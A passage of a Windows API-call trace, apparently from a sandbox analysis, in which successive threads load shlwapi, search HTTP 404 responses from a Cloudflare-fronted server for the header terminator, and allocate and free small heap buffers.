returned="\r\n\r\n\x08" [0303.107] GetProcessHeap () returned 0x740000 [0303.107] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0303.107] GetProcessHeap () returned 0x740000 [0303.107] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0303.107] GetProcessHeap () returned 0x740000 [0303.107] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 79 os_tid = 0x104c [0304.037] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.037] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:18 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=lGYj4HR9wZVJoPakMlvjHxxv0onw0MafyzyyBFm5oGe8UOIirgbckWEvB%2B8zgo28aCfH82gZQZCmisBJWopLrjiMP0Ko%2F0KSlbaj7QnkFInQfCqgq4hK3kPHGhWZkQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db36706689d9159-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0304.037] GetProcessHeap () returned 0x740000 [0304.037] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0304.037] GetProcessHeap () returned 0x740000 [0304.037] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0304.037] GetProcessHeap () returned 0x740000 [0304.038] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 80 os_tid = 0x1050 [0304.323] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.323] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:19 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=HRr9lBUBkHiIW4hv36r8hYhCZevDRQMzfipAxOCFq1bMyk%2B%2F3zJmQ2Rd0jRZ0hqVi3OkHwxDI9txSZPKL6r9hKN5w3Hj4kliWmyj1s2jHO2kfV4Nz0hcZ2v6uHGsAQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db3670c899f905b-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0304.323] GetProcessHeap () returned 0x740000 [0304.323] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0304.323] GetProcessHeap () returned 0x740000 [0304.323] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0304.323] GetProcessHeap () returned 0x740000 [0304.324] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 81 os_tid = 0x1054 [0304.560] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.560] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:19 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=dQ%2FU4ngDVdZ6UhsxgcOFkSfE18LqoeWe8jiQkljR2s5W94wmGVexckmDOScrH5MIzqQE4hkUVattYz%2BWGCeuXLSzP7%2FVyGi04O18JFpGUvFCVToMNAnA1BJ185OXIg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db3670e2eab918c-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0304.560] GetProcessHeap () returned 0x740000 [0304.560] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0304.561] GetProcessHeap () returned 0x740000 [0304.561] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0304.561] GetProcessHeap () returned 0x740000 [0304.561] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 82 os_tid = 0x1058 [0304.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.813] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:19 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ZgAhO5HFUulHwAsdflpXnC3Zx48uiq9D6FhGvv96IKe0mqCLkz3O2hskzJ2%2BklTULgQ7arJ58q8lCOsKfh3d7LkLFajVeSrYFEYLCrcrPZ9PnHc%2F25ACin7oGrZp2A%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db3670f8ba892a5-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0304.813] GetProcessHeap () returned 0x740000 [0304.813] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0304.813] GetProcessHeap () returned 0x740000 [0304.813] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0304.813] GetProcessHeap () returned 0x740000 [0304.814] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 83 os_tid = 0x105c [0305.051] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.051] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:19 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=E99Z9UdyTTQpr2%2F9xgzxoEgqoQUnQw0Wvj4T6iu7DiDu1%2FaWJ8kfTkNBpShRz%2F4rWO%2FLokL62xPLaD6mmqs0UwRIHAK6xUUaszjYuAI3DK3%2FIwfnEKU55Zdr88mJ9g%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db367111bfa905e-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0305.051] GetProcessHeap () returned 0x740000 [0305.051] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0305.051] GetProcessHeap () returned 0x740000 [0305.051] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0305.051] GetProcessHeap () returned 0x740000 [0305.052] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 84 os_tid = 0x1064 [0305.392] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.394] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:20 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=B86r7E7Eixzmfy9WVqjl8%2FG%2BbEk%2FfL%2BHIgEMpn9qbUo4oz1cVEztGfwYEXh38OHerlhXEOeJYwZo%2Bj42H1o6RECZeeGJneaF0TaeTib80Ig%2BueJXHdy4aFpP1M6N%2FQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db367133f1768e9-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0305.394] GetProcessHeap () returned 0x740000 [0305.394] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0305.394] GetProcessHeap () returned 0x740000 [0305.394] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0305.395] GetProcessHeap () returned 0x740000 [0305.395] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 85 os_tid = 0x1068 [0305.734] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.734] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:20 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=nz0%2BXijEUU9YY6Dex5KuZ1DWqTOwomXVT6FLYqZXW8fxR8DKX98JKOQxxPtnY%2BJVfys6U5Yx6PXb7B8keS6MHK%2BqjqjAM489KJJADlyfIXm5VXKBbWdQT0K4ExHWGw%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db367153865926e-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0305.734] GetProcessHeap () returned 0x740000 [0305.734] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0305.735] GetProcessHeap () returned 0x740000 [0305.735] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0305.735] GetProcessHeap () returned 0x740000 [0305.735] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 86 os_tid = 0x106c [0306.046] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.046] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:20 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=%2BM0lVQh6Tcft9QxiX7uodf6r1isLE6nBe40%2BEx8ijdMeUQ3ZffBS%2BTsWPAgeV2s89qkftpefdTnCBdHEaNtICAwYxrlqWGkg519lzL%2FN004Kl0TdGjrW6GaOfUBwHQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db367175e23905b-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0306.046] GetProcessHeap () returned 0x740000 [0306.046] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0306.046] GetProcessHeap () returned 0x740000 [0306.046] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0306.046] GetProcessHeap () returned 0x740000 [0306.047] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 87 os_tid = 0x1074 [0306.558] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.559] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:21 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=kbgemLEP%2F%2BVhAy0TPGAL62ZCS4gpCsro%2FcEjsPbvjll4uBcM7A0qV13JVE5h27f69GdI9U3pYgGNJtOEIdYr2ce6d3zYIAwsR2KqUR8dhf%2BQKMvjO4U5%2Fq5rcZcYtg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db367198cae90a0-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0306.559] GetProcessHeap () returned 0x740000 [0306.559] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0306.559] GetProcessHeap () returned 0x740000 [0306.559] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0306.559] GetProcessHeap () returned 0x740000 [0306.560] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 88 os_tid = 0x1078 [0306.968] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.968] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:21 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=HkaeQO%2Bc1e4IHbs8tG9vis0KSohB0KA252A1bheV3IGQGIoCApJoGJLCQNoG3pqQBjr9Uh4Mrr0Biep6wZUVkJmLchYl6Tp31kO9Gm9yvj%2FZcL97JuSpRIwFBnUzRQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db3671c7dd090bb-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0306.968] GetProcessHeap () returned 0x740000 [0306.969] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0306.969] GetProcessHeap () returned 0x740000 [0306.969] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0306.969] GetProcessHeap () returned 0x740000 [0306.969] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 89 os_tid = 0x107c [0307.317] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.318] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:21 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=UBxU8NWi8pqlUWsVsTjdq%2FGtSDT6vYM5o6Mwc5KGEWf%2BuqO1TibaXZ0ELuiMSqLS5wPtPd2tVTYLB5zien15ATjrr2cuFAm2SmojGBZ7pLH1TKJ3GViLyuSaLPDIkQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db3671ecaf09199-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0307.318] GetProcessHeap () returned 0x740000 [0307.318] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3e8 [0307.318] GetProcessHeap () returned 0x740000 [0307.318] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3e8 | out: hHeap=0x740000) returned 1 [0307.318] GetProcessHeap () returned 0x740000 [0307.318] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 90 os_tid = 0x1080 [0307.561] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.562] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:22 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=DcyNCmYprjMsq51Je6aa9YbGHitkV6tsT20sjLgQtPccXHWYuyAkEtQxCtq%2BuxkKu6ZbjTTEAOvx7hXC8kUbfIEIhCqyfdrHQ5Os8yxfhbcimHLxlcvJapBWwpjvYQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db367210e736901-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0307.562] GetProcessHeap () returned 0x740000 [0307.562] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0307.562] GetProcessHeap () returned 0x740000 [0307.562] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0307.562] GetProcessHeap () returned 0x740000 [0307.562] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 91 os_tid = 0x10b8 [0307.839] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.839] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:22 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=HKa6gLXhGpjnHxX%2FQoyjnk7kvFs%2FhWiH8mDXSowVo1S7nsZZyCnc1FzDIhybyXVyfXa6hnX7el8wVludLWvlp9nhLoBJ0DKbGXGlg9Ywou2QOildxDSQ1SwyFgdBCQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db36722e818905b-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0307.840] GetProcessHeap () returned 0x740000 [0307.840] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0307.840] GetProcessHeap () returned 0x740000 [0307.840] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0307.840] GetProcessHeap () returned 0x740000 [0307.840] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 92 os_tid = 0x10fc [0308.185] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0308.185] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:22 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=asuY2%2FdfXa6Wx%2FBJFEgpHGF6d3%2BC1JOaQ9tEts%2BHsnyyo8z9IRx0HGJMryG%2F4ohk%2ByHt9wtMt5cB%2BNm8Ou%2B15BKBRuN5MxLynAg06aAMmB6y8eEjuJlWmC8D0vocSA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db367242d19909a-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0308.186] GetProcessHeap () returned 0x740000 [0308.186] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0308.186] GetProcessHeap () returned 0x740000 [0308.186] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0308.186] GetProcessHeap () returned 0x740000 [0308.187] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 93 os_tid = 0x1100 [0308.826] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0308.826] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:23 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=OLJyU2S3duH%2BpSeGEOXn6753iJtLNeUwLz%2B%2F1VvgiJrhcPbzktiHhW0Cx3T%2FSDhByICFkpf6JI8SB8rba0Gd8fpnOTcKBbkbJFj3%2BtYC8j4SBMgR%2B4YYKevJrU6yGQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db36728fcd5915c-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0308.827] GetProcessHeap () returned 0x740000 [0308.827] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0308.827] GetProcessHeap () returned 0x740000 [0308.827] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0308.827] GetProcessHeap () returned 0x740000 [0308.827] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 94 os_tid = 0x10bc [0309.350] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0309.351] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:23 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=yRwqMCn7ghijrmivwVAhxTzUn%2F0wsD5%2FJqgnHC4swMCSzzgpdzlr3V7FQGkzIX%2FXqvRCUh1gRGKyVkMoFe9UhkxVNCd3qPlpKI56AbbQSMgpdtjRGekE90ogb9Pkrg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db3672a5bb692b4-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0309.351] GetProcessHeap () returned 0x740000 [0309.351] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0309.351] GetProcessHeap () returned 0x740000 [0309.351] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0309.351] GetProcessHeap () returned 0x740000 [0309.352] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 95 os_tid = 0x1358 [0309.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0309.792] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:24 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=02goB%2FNOJTUSHf2qnmYK5n35K3ouTVwFMs4vZLZX%2F5V7pXEt7xqbei7SgJwuNhxgBdG7Q3FwPtvZ73m%2FxfKyBuh0owJHjZh%2FyDVTn%2BNFXv%2BC5KkxfLyro7nB2FkhtQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db3672e6e1b8fe9-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0309.792] GetProcessHeap () returned 0x740000 [0309.792] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0309.792] GetProcessHeap () returned 0x740000 [0309.792] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0309.792] GetProcessHeap () returned 0x740000 [0309.792] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 96 os_tid = 0x13d4 [0310.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.201] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:24 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=tVHQjSTVCh9LtpGy0gTyfsS2oaFx1gQmNa9yu0b2NhEaPWq7uFCAggWDn%2FNBqeQmp0x0FEfb9ZouB1Z67ehRDxdnQ9u6KiFSl%2FmoDscLpBg3Ih5PH4EN%2B4N9L0Jpag%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db3673119f6920d-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0310.201] GetProcessHeap () returned 0x740000 [0310.201] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0310.201] GetProcessHeap () returned 0x740000 [0310.201] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0310.201] GetProcessHeap () returned 0x740000 [0310.201] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 97 os_tid = 0xd24 [0310.454] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.454] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:25 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=gza%2B79f2q%2BurKeQYixfSnt8pq7vDBdzeSErpNJOyy35cJRHpLRNDP%2BAFkRiZug1U55OEXLJI%2BXPNqzb5mkeN4lmGvTOqpJ7hHcvO%2FlDt%2B01ElJmvKWSG5nICNf09bA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db36732ca9f5b44-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0310.454] GetProcessHeap () returned 0x740000 [0310.454] RtlAllocateHeap 